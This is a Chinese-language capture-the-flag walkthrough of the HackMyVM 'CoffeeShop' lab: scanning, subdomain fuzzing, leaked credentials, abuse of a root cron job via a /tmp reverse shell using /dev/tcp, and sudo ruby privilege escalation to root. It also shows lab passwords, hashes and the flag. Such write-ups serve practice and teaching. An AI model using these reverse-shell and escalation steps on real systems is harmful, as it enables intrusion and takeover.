简介
难度:简单
靶场地址:https://hackmyvm.eu/machines/machine.php?vm=CoffeeShop
本地环境
虚拟机:vitual box
靶场IP(CoffeeShop):192.168.56.109
跳板机IP(windows 10):192.168.56.1 192.168.190.100
渗透机IP(ubuntu 22.04):192.168.190.30
扫描
试试zenmap
nmap -p 1-65535 -T4 -A -v 192.168.56.109/32
目标为22和80
http
朴实无华的界面
nikto扫出了一个路径/shop
❯ ./nikto.pl -h http://192.168.56.109 -C all -o res.html -F htm
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.56.109
+ Target Hostname: 192.168.56.109
+ Target Port: 80
+ Start Time: 2024-04-02 22:05:41 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.52 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Server may leak inodes via ETags, header found with file /, inode: 69a, size: 60e0d6c9d917a, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.52 appears to be outdated (current is at least 2.4.57). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: HEAD, GET, POST, OPTIONS .
+ /shop/: This might be interesting.
+ 26616 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2024-04-02 22:07:08 (GMT8) (87 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
这里有个login界面,当时没想太多,就一股脑想着sql注入和账密爆破,结果调了很长时间都没有结果
子域名爆破
使用ffuf进行爆破
ffuf -w /root/Tool/HVV/8_dict/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt -u http://midnight.coffee -H "Host: FUZZ.midnight.coffee" -fs 1690
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.1.0
________________________________________________
:: Method : GET
:: URL : http://midnight.coffee
:: Wordlist : FUZZ: /root/Tool/HVV/8_dict/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.midnight.coffee
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
:: Filter : Response size: 1690
________________________________________________
dev [Status: 200, Size: 1738, Words: 575, Lines: 72]
:: Progress: [114441/114441] :: Job [1/1] :: 4401 req/sec :: Duration: [0:00:26] :: Errors: 0 ::
得到子域名dev
username:developer
passwd:developer
试了一下,ssh登不进去,在shop的登录界面成功登陆
tuna : 1L0v3_TuN4_Very_Much
获得ssh账密,成功登陆
user提权
mysql
看一下网络情况
tuna@coffee-shop:~$ netstat -lntp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN
tcp6 0 0 :::22 :::* LISTEN
tcp6 0 0 :::80 :::* LISTEN
可以看到开启了3306、33060端口,mysql服务。暂时没有账密,可以先记着。
然后去收集信息,在login.php里面找到明文账密
$host = 'localhost';
$username = 'shopadmin';
$password = '1_4m_4dmin';
$database = 'midnightcoffee';
成功登陆数据库
收集账密
mysql> select * from users
-> ;
+----+-----------+--------------------------------------------------------------+----------------------------------+
| id | username | password | auth_token |
+----+-----------+--------------------------------------------------------------+----------------------------------+
| 1 | shopadmin | $2a$12$yqH60OJyTqoPHXe1g1cGDu93me1v.wGcEEZV5rLy39stUJO.Xsjwi | NULL |
| 2 | tuna | 1L0v3_TuN4_Very_Much | NULL |
| 3 | developer | developer | ceb5142eb99532109a34040738016fcd |
+----+-----------+--------------------------------------------------------------+----------------------------------+
3 rows in set (0.00 sec)
可惜shopadmin在网站上能登陆,在靶机内部不行,john爆了hash也不行,有点离谱的。不过这也是种信息收集思路,虽然在这里行不通。
crontab
tuna@coffee-shop:/home/shopadmin$ cat /etc/crontab
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * /bin/bash /home/shopadmin/execute.sh
看到最后一条有一个每隔一分钟执行一次的任务(全为*默认一分钟一轮),查看一下
tuna@coffee-shop:/home/shopadmin$ cat execute.sh
#!/bin/bash
/bin/bash /tmp/*.sh
更加离谱了……
写一个反弹shell,监听一会儿就有了
靶机:
tuna@coffee-shop:/tmp$ cat shell.sh
bash -c "bash -i >& /dev/tcp/192.168.56.1/40001 0>&1"
跳板机:
>netsh interface portproxy show all
侦听 ipv4: 连接到 ipv4:
地址 端口 地址 端口
--------------- ---------- --------------- ----------
0.0.0.0 40000 192.168.190.30 40000
0.0.0.0 40001 192.168.190.30 40001
0.0.0.0 47000 192.168.190.30 47000
渗透机:
rlwrap -cAr nc -lvvp 40001
root提权
sudo -l起手
shopadmin@coffee-shop:~$ sudo -l
sudo -l
Matching Defaults entries for shopadmin on coffee-shop:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User shopadmin may run the following commands on coffee-shop:
(root) NOPASSWD: /usr/bin/ruby * /opt/shop.rb
这个命令的意思是执行当前目录下的任意脚本(*)和/opt/shop.rb
所以直接写一个ruby的shell就行了
exec "/bin/bash"
提权成功
C4FF3331N-ADD1CCCTIONNNN
3万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
